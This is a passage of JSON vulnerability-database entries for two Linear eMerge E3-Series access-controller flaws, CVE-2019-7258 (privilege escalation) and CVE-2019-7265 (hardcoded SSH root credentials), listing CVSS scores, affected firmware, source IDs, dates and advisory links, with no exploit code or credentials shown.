"id": "JVNDB-2019-005910"
},
{
"db": "NVD",
"id": "CVE-2019-7258"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7258"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "LiquidWorm",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-105"
}
],
"trust": 0.6
},
"cve": "CVE-2019-7258",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-7258",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CNVD-2019-34628",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "VHN-158693",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-7258",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7258",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2019-34628",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-105",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-158693",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34628"
},
{
"db": "VULHUB",
"id": "VHN-158693"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005910"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-105"
},
{
"db": "NVD",
"id": "CVE-2019-7258"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear eMerge E3-Series devices allow Privilege Escalation. Linear eMerge E3 Series devices contain vulnerabilities related to authorization, privileges, and access control.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security \u0026 Control Linear eMerge E3-Series is an access control device from Nortek Security \u0026 Control, USA. \n\nNortek Security \u0026 Control Linear eMerge E3-Series has a permission permission and access control problem vulnerability. An attacker could use this vulnerability to elevate to superuser privileges",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7258"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005910"
},
{
"db": "CNVD",
"id": "CNVD-2019-34628"
},
{
"db": "VULHUB",
"id": "VHN-158693"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7258",
"trust": 3.9
},
{
"db": "PACKETSTORM",
"id": "155260",
"trust": 1.7
},
{
"db": "ICS CERT",
"id": "ICSA-24-065-01",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU96911165",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005910",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-105",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-34628",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-158693",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34628"
},
{
"db": "VULHUB",
"id": "VHN-158693"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005910"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-105"
},
{
"db": "NVD",
"id": "CVE-2019-7258"
}
]
},
"id": "VAR-201907-0159",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34628"
},
{
"db": "VULHUB",
"id": "VHN-158693"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34628"
}
]
},
"last_update_date": "2024-03-18T22:23:59.275000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "eMerge\u00a0E3-Series\u00a0Access\u00a0Control",
"trust": 0.8,
"url": "https://www.nortekcontrol.com/pdf/literature/emerge-e3-series-brochure.pdf"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005910"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-863",
"trust": 1.1
},
{
"problemtype": "Authorization / authority / access control (CWE-264) [NVD evaluation ]",
"trust": 0.8
},
{
"problemtype": "CWE-264",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158693"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005910"
},
{
"db": "NVD",
"id": "CVE-2019-7258"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.applied-risk.com/resources/ar-2019-005"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7258"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/155260/linear-emerge-e3-1.00-06-privilege-escalation.html"
},
{
"trust": 1.7,
"url": "https://applied-risk.com/labs/advisories"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu96911165/"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34628"
},
{
"db": "VULHUB",
"id": "VHN-158693"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005910"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-105"
},
{
"db": "NVD",
"id": "CVE-2019-7258"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-34628"
},
{
"db": "VULHUB",
"id": "VHN-158693"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005910"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-105"
},
{
"db": "NVD",
"id": "CVE-2019-7258"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-34628"
},
{
"date": "2019-07-02T00:00:00",
"db": "VULHUB",
"id": "VHN-158693"
},
{
"date": "2019-07-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-005910"
},
{
"date": "2019-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-105"
},
{
"date": "2019-07-02T19:15:11.290000",
"db": "NVD",
"id": "CVE-2019-7258"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-34628"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-158693"
},
{
"date": "2024-03-07T08:15:00",
"db": "JVNDB",
"id": "JVNDB-2019-005910"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-105"
},
{
"date": "2022-10-14T01:33:11.630000",
"db": "NVD",
"id": "CVE-2019-7258"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-105"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear\u00a0eMerge\u00a0E3\u00a0 Vulnerabilities related to authorization, privileges, and access control in series devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005910"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control issues",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-105"
}
],
"trust": 0.6
}
}
VAR-201907-0166
Vulnerability from variot - Updated: 2024-03-18 22:23Linear eMerge E3-Series devices allow Remote Code Execution (root access over SSH). Linear eMerge E3 series devices contain a vulnerability related to the use of hardcoded credentials.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state.
Nortek Security & Control Linear eMerge E3-Series has a trust management issue vulnerability. An attacker could exploit this vulnerability to execute code
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201907-0166",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linear emerge elite",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge essential",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge elite",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "linear emerge essential",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "security\u0026control linear emerge e3-series",
"scope": "lte",
"trust": 0.6,
"vendor": "nortek",
"version": "\u003c=1.00-06"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34629"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005913"
},
{
"db": "NVD",
"id": "CVE-2019-7265"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7265"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "LiquidWorm",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-100"
}
],
"trust": 0.6
},
"cve": "CVE-2019-7265",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2019-7265",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-34629",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-158700",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-7265",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7265",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2019-34629",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-100",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-158700",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34629"
},
{
"db": "VULHUB",
"id": "VHN-158700"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005913"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-100"
},
{
"db": "NVD",
"id": "CVE-2019-7265"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear eMerge E3-Series devices allow Remote Code Execution (root access over SSH). Linear eMerge E3 series devices contain a vulnerability related to the use of hardcoded credentials.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. \n\nNortek Security \u0026 Control Linear eMerge E3-Series has a trust management issue vulnerability. An attacker could exploit this vulnerability to execute code",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7265"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005913"
},
{
"db": "CNVD",
"id": "CNVD-2019-34629"
},
{
"db": "VULHUB",
"id": "VHN-158700"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7265",
"trust": 3.9
},
{
"db": "PACKETSTORM",
"id": "155267",
"trust": 1.7
},
{
"db": "ICS CERT",
"id": "ICSA-24-065-01",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU96911165",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005913",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-100",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-34629",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "47625",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-158700",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34629"
},
{
"db": "VULHUB",
"id": "VHN-158700"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005913"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-100"
},
{
"db": "NVD",
"id": "CVE-2019-7265"
}
]
},
"id": "VAR-201907-0166",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34629"
},
{
"db": "VULHUB",
"id": "VHN-158700"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34629"
}
]
},
"last_update_date": "2024-03-18T22:23:59.246000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "eMerge\u00a0E3-Series\u00a0Access\u00a0Control",
"trust": 0.8,
"url": "https://www.nortekcontrol.com/pdf/literature/emerge-e3-series-brochure.pdf"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005913"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-798",
"trust": 1.1
},
{
"problemtype": "Use hard-coded credentials (CWE-798) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158700"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005913"
},
{
"db": "NVD",
"id": "CVE-2019-7265"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.applied-risk.com/resources/ar-2019-005"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7265"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/155267/nortek-linear-emerge-e3-access-controller-1.00-06-ssh-ftp-remote-root.html"
},
{
"trust": 1.7,
"url": "https://applied-risk.com/labs/advisories"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu96911165/"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/47625"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34629"
},
{
"db": "VULHUB",
"id": "VHN-158700"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005913"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-100"
},
{
"db": "NVD",
"id": "CVE-2019-7265"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-34629"
},
{
"db": "VULHUB",
"id": "VHN-158700"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005913"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-100"
},
{
"db": "NVD",
"id": "CVE-2019-7265"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-34629"
},
{
"date": "2019-07-02T00:00:00",
"db": "VULHUB",
"id": "VHN-158700"
},
{
"date": "2019-07-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-005913"
},
{
"date": "2019-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-100"
},
{
"date": "2019-07-02T17:15:12.070000",
"db": "NVD",
"id": "CVE-2019-7265"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
